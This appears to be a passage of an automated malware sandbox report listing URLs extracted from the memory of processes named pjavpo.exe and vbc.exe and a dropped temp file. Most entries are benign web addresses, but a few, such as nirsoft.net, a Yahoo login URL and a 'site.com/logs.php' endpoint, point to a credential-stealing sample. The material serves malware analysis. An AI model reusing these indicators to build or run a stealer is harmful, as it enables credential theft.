                Source: bhv8D09.tmp.13.drString found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/consent/55a804
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/scripttemplate
                Source: vbc.exe, vbc.exe, 0000000D.00000000.306589441.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000D.00000000.306007276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000D.00000002.332740364.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
                Source: pjavpo.exe, 00000005.00000002.499537073.0000000006202000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                Source: pjavpo.exe, 00000005.00000003.267079423.0000000004F9E000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000003.266811417.0000000004F9E000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000003.266664691.0000000004F9E000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000003.266920825.0000000004F9E000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.499537073.0000000006202000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000003.267323200.0000000004F9E000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000003.267222556.0000000004F9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                Source: pjavpo.exe, 00000005.00000003.266505711.0000000004F9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.comuv
                Source: pjavpo.exe, 00000005.00000002.499537073.0000000006202000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                Source: pjavpo.exe, 00000005.00000002.493747770.0000000002801000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.site.com/logs.php
                Source: pjavpo.exe, 00000005.00000002.499537073.0000000006202000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                Source: pjavpo.exe, 00000005.00000003.255550167.0000000004F9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com5
                Source: pjavpo.exe, 00000005.00000003.260312379.0000000004F9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.comLv
                Source: pjavpo.exe, 00000005.00000003.260312379.0000000004F9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.comic
                Source: pjavpo.exe, 00000005.00000002.499537073.0000000006202000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                Source: pjavpo.exe, 00000005.00000003.274619011.0000000004F9E000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000003.270053098.0000000004F9E000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000003.274342061.0000000004F9E000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000003.274465406.0000000004F9E000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000003.269915108.0000000004F9E000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000003.274755127.0000000004F9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.de
                Source: pjavpo.exe, 00000005.00000002.499537073.0000000006202000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                Source: pjavpo.exe, 00000005.00000003.269915108.0000000004F9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deF$wC
                Source: pjavpo.exe, 00000005.00000003.270053098.0000000004F9E000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000003.269915108.0000000004F9E000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000003.270154747.0000000004F9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deQv
                Source: pjavpo.exe, 00000005.00000003.274619011.0000000004F9E000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000003.274342061.0000000004F9E000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000003.274465406.0000000004F9E000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000003.274755127.0000000004F9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.derT
                Source: pjavpo.exe, 00000005.00000003.257123163.0000000004F9E000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.499537073.0000000006202000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                Source: vbc.exe, 0000000D.00000003.328322633.000000000220D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000003.327668619.000000000222A000.00000004.00000800.00020000.00000000.sdmp, bhv8D09.tmp.13.drString found in binary or memory: https://172.217.23.78/
                Source: vbc.exe, 0000000D.00000003.325110381.000000000220D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000003.323407346.000000000222A000.00000004.00000800.00020000.00000000.sdmp, bhv8D09.tmp.13.drString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=8072167097284;g
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=4510094
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://adservice.google.co.uk/adsid/google/si?gadsid=AORoGNRfxSclVePPTskt_ULwutuxovZBENP6CQBK41sqxH
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://adservice.google.co.uk/adsid/google/si?gadsid=AORoGNSN_Te_GQT33AAAR6UNrVcn3a-PGny50bSNsHlzoT
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://adservice.google.co.uk/adsid/google/ui?gadsid=AORoGNQXg7AHkvg6J6S0TqGFa_0HynGV3_XxYfs4fLINJG
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://adservice.google.co.uk/adsid/google/ui?gadsid=AORoGNRxRJyZzZp4KXfYTC7Z4q4fsi2jmRa8YGEqdB288n
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://adservice.google.com/adsid/google/si?gadsid=AORoGNSvKHbjRugN8Bruw1IrFif72u8bwsJvZ4BRSrMAhil_
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://adservice.google.com/adsid/google/si?gadsid=AORoGNTzML9SvDOPLAOFxwn751k-3cAoAULy2FWuSRb89C_P
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://adservice.google.com/adsid/google/ui
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=2542116;cat=chom0;ord=8072167097284;gtm=2wg9
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://amp.azure.net/libs/amp/1.8.0/azuremediaplayer.min.js
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.9Ky5Gf3gP0o.O/m=gapi_iframes
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://arc.msn.com/v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=314559&adm=
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC54c8a2b02c3446f48a60b41e8a5ff47
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC5bdddb231cf54f958a5b6e76e9d8eee
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC828bc1cde9f04b788c98b5423157734
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC9b2d2bc73c8a4a1d8dd5c3d69b6634a
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCc13122162a9a46c3b4cbf05ffccde0f
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCc71c68d7b8f049b6a6f3b669bd5d00c
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCee0d4d5fd4424c8390d703b105f82c3
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCfd484f9188564713bbc5d13d862ebbf
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://assets.adobedtm.com/launch-EN7b3d710ac67a4a1195648458258f97dd.min.js
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://az416426.vo.msecnd.net/scripts/a/ai.0.js
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://az725175.vo.msecnd.net/scripts/jsll-4.js
                Source: vbc.exe, 0000000D.00000003.325110381.000000000220D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000003.323407346.000000000222A000.00000004.00000800.00020000.00000000.sdmp, bhv8D09.tmp.13.drString found in binary or memory: https://consent.google.com/?hl=en-GB&origin=https://www.google.com&continue=https://www.google.com/?
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://consent.google.com/done8?continue=https://www.google.com/?gws_rd%3Dssl&origin=https://www.go
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://consent.google.com/set?pc=s&uxe=4421591
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://contextual.media.net/
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://contextual.media.net/48/nrrV18753.js
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://contextual.media.net/803288796/fcmain.js?&gdpr=0&cid=8CU157172&cpcd=pC3JHgSCqY8UHihgrvGr0A%3
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://contextual.media.net/__media__/js/util/nrrV9140.js
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
                Source: vbc.exe, 0000000D.00000003.324826424.00000000027E5000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000003.324542822.00000000009ED000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 0000000D.00000003.325057893.00000000009EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contextual.media.net/checksync.phphttps://contextual.media.net/medianet.php?cid=8CU157172&cr
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://cvision.media.net/new/100x75/2/249/241/157/ab7b8862-dfb2-4e59-a214-ff623600dbf5.jpg?v=9
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://cvision.media.net/new/100x75/2/89/162/29/8ee7a9a3-dec9-4d15-94e1-5c73b17d2de1.jpg?v=9
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://cvision.media.net/new/100x75/3/148/118/158/6d596081-b574-4a8a-9662-8f180c6f659f.jpg?v=9
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://cvision.media.net/new/286x175/2/249/241/157/ab7b8862-dfb2-4e59-a214-ff623600dbf5.jpg?v=9
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://cvision.media.net/new/286x175/3/148/118/158/6d596081-b574-4a8a-9662-8f180c6f659f.jpg?v=9
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://cvision.media.net/new/300x300/2/41/100/83/b5cbfa68-1c93-41c9-8797-4f9b532bc0b6.jpg?v=9
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://cvision.media.net/new/300x300/3/167/174/27/39ab3103-8560-4a55-bfc4-401f897cf6f2.jpg?v=9
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7B83C84637
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQE7dARJDf70CVtvXguPcFi4kAoAFTTEX3FZ_Kd&s=0
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQEZeIjizh9n8teY_8BOjsYtpLHwSdIq3PT-WQtot4&s=10
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQFso5PEv3c0kRR2gODJUq62DZF6fnxNsqKUTBX-00QeuCR
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQJBttAzO3yKFNSKzEm8qyQoBw2vbSHn0xMB0yhbgc&s=10
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQSkA3BhTLNTXreS8GxkTmsFGydHUKxWR3gtSn5&s=0
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQYaLHOGeTAvxcl2Kvu_RGdrblf1tOpndi7m5_OMgFvfzlI
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQc9-XcC69nXJpriIbLos4bSDdjrz_nByi2zL9xxJ4&s=10
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQcijPNIB_ZGSU0DrjPI_tJ1YOI-6PHUbyHUjTLi3M5nnkK
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQehqYcvOrRcw1YORGnrCzHbNyjMegefhpqYrPQO8G2_KPc
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQyeaAiOCtrhzoyiUuHOZcp67UWv4aYiYIKZ629tWqIyQ_l
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcR6qDJUCBqqO8k81oIRUuLKwKNP-ux5oIGn1btf&s=0
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcRXMqY1lU5NXqI7H2QRWgHFAYTsfVdew3_6QMhtv0g&s=10
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcRZaO1x4iyU-YgxgvuerXdFmXdj8Ce3rNy8Mqw2SlqePXDg
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcRlHYHZu1FxxbUNbpii9NbSF3wy4srqmfLAOC-QBxw&s
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcS2yfg_cFEuqKFbNZCaFykqy-jW3vHyGM224t0Sov33iXvh
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcS7Tsy61sPGCiV6yILYtCYyP2q9i9bHmXBPqktk0xQvTH0l
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcS9bnSRFZj9kLnT0CeZ7r27C9IrO3sFLnQL62gz&s=0
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcSHEjIxVJou5NRecC2n_FnHaUJDfppR3IDOglu2Ry9INoxt
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcSKx7_Dt9K5OFgp-raiLw2XdVNOTbR27N_DCL6T8VDVN_16
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcSTkM_f5rN2hSSg3E_UshkUpgZ0a66Lz0rF6gF6&s=0
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcScI5035wSfgyvpN8fX27BnFHfF4a7I8z7Xlm7v&s=0
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcSpNsTsg--kCoAxXjTvRrABIfJjd5ITzVx14ODQUC4wDGzB
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcSrCEL2r-B2oHHnS0EeiVjQLJYayeF4GHjCZod9vr4&s
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcSvX77JsybkskW6WoLj5kY6exJKuOkXoRWSsNgJbFY&s
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcT9-gm37CbSVQ1QMRdyqOvdY12lHBO7fXpaqZZqKP2Wbjr2
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTKoe8A2_V1bWtOlP5fx10ZdjsJZv6l2_sKjTp6jVAPnp0g
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcThUknsbAksExwESRgK7TW5ujPLzgeGDT0-A3f5a1XrdyR-
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTo0t2j428kWHZlc2etqXbsI-zLrpgSp87E2H24&s=0
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://fonts.googleapis.com/css?family=Google
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://fonts.gstatic.com/s/googlesans/v14/4UabrENHsxJlGDuGo1OIlLU94YtzCwA.woff
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://fonts.gstatic.com/s/googlesans/v16/4UaGrENHsxJlGDuGo1OIlI3K.woff
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://fonts.gstatic.com/s/googlesans/v16/4UabrENHsxJlGDuGo1OIlLU94bt3.woff
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmEU9fBBc-.woff
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmSU5fBBc-.woff
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmWUlfBBc-.woff
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v18/KFOmCnqEu92Fr1Mu4mxM.woff
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v20/KFOlCnqEu92Fr1MmEU9vAA.woff
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v20/KFOmCnqEu92Fr1Me5g.woff
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://googleads.g.doubleclick.net/adsid/google/si?gadsid=AORoGNQXwBwQrE_SUsnWzwpadcOOdc8yOg6JxthQN
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://googleads.g.doubleclick.net/adsid/google/si?gadsid=AORoGNTXuGHPo1zFjYPXt7mTG-4GALGGk8bjqjvBm
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://googleads.g.doubleclick.net/adsid/google/ui?gadsid=AORoGNQP1yCl9r5iywZTFTjpazv-DURVxDidzMfrF
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://googleads.g.doubleclick.net/adsid/google/ui?gadsid=AORoGNSrZsXAj6n_sYvivJecwrpYgMhb9ihVGAlz2
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE1Mu3b?ver=5c31
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4DnuZ
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4Dnv6
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4Dnwt
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4DsDH
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmQ
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmV
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmZ
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FGwC
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4n1yl
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4n4cm
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ncJ7
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ncJa
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4nqTh
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4sQww?ver=37ff
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tD2S
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tG3O
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tIoW
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tIoY
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tKUA
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tMOD
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tMOM
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tQVa
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4u1kF
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ubMD
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4wqj5
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4zuiC
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RWeTGO?ver=8c74&q=90&m=
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://lh5.googleusercontent.com/p/AF1QipOcdIDtTfqJElTfRhjdFP9dPcYlW61iEhrydiuX=w92-h92-n-k-no
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: pjavpo.exe, vbc.exeString found in binary or memory: https://login.yahoo.com/config/login
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://logincdn.msauth.net/16.000.28230.00/ConvergedLoginPaginatedStrings.en.js
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://logincdn.msauth.net/16.000.28230.00/ConvergedLogin_PCore.js
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://logincdn.msauth.net/16.000.28230.00/Converged_v21033.css
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://logincdn.msauth.net/16.000.28230.00/MeControl.js
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://logincdn.msauth.net/16.000.28230.00/images/ellipsis_white.svg?x=5ac590ee72bfe06a7cecfd75b588
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://logincdn.msauth.net/16.000.28230.00/images/microsoft_logo.svg?x=ee5c8d9fb6248c938fd0dc19370e
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://logincdn.msauth.net/16.000.28666.10/content/images/ellipsis_grey_2b5d393db04a5e6e1f739cb266e
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://logincdn.msauth.net/16.000.28666.10/content/images/ellipsis_white_5ac590ee72bfe06a7cecfd75b5
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://logincdn.msauth.net/16.000.28666.10/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc1937
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v21033_-0mnSwu67knBd7qR7YN9GQ2.css
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en_5QoHC_ilFOmb96M0pIeJ
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/OldConvergedLogin_PCore_xqcDwEKeDux9oCNjuqEZ-A2.js
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://maps.windows.com/windows-app-web-link
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://mem.gfx.ms/me/MeControl/10.19168.0/en-US/meBoot.min.js
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://mem.gfx.ms/me/MeControl/10.19168.0/en-US/meCore.min.js
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://mem.gfx.ms/meversion?partner=RetailStore2&market=en-us&uhf=1
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://mwf-service.akamaized.net/mwf/css/bundle/1.57.0/west-european/default/mwf-main.min.css
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://mwf-service.akamaized.net/mwf/js/bundle/1.57.0/mwf-auto-init-main.var.min.js
                Source: vbc.exe, 0000000D.00000003.325110381.000000000220D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000003.323407346.000000000222A000.00000004.00000800.00020000.00000000.sdmp, bhv8D09.tmp.13.drString found in binary or memory: https://ogs.google.com/widget/callout?prid=19020392&pgid=19020380&puid=93eb0881ae9ec1db&origin=https
                Source: vbc.exe, 0000000D.00000003.324826424.00000000027E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com/widget/callouthttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2019-06-26-21-10-17/PreSignInSettingsConfig.json
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2019-06-26-21-10-17/PreSignInSettingsConfig.json?One
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2020-07-22-21-45-19/PreSignInSettingsConfig.json?One
